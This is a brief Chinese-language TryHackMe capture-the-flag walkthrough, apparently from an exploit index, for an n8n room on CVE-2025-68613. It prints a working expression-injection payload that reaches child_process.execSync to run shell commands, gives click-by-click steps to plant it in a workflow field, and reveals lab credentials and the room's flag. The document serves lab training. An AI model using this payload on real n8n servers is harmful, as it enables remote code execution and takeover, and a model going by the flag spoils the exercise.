## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-J4CK3LSYN-GEN2-N8N-CVE-2025-68613-TRYHACKME
# TryHackMe 房间:n8n:CVE-2025-68613
_玩家:_ J4ck3LSyN

_主机:_ `...`
_用户名:_ `some-email@example.com`
_密码:_ `Try12345!`
## 方法
_Payload:_ `{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })() }}` _Payload 2:_ `{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })() }}`
1. 访问攻击机。
2. `Start New`
3. `Add First Step`,右侧栏会打开,然后添加 `Manual Trigger`。
4. 之后添加一个 `Set Fields` 选项。
5. 添加一个名为 `pwn` 的字段,并填入 payload。
6. 执行并 pwn。
7. 将 payload 改为执行 `cat flag.txt` \- Flag: `THM{n8n_exposed_workflow}`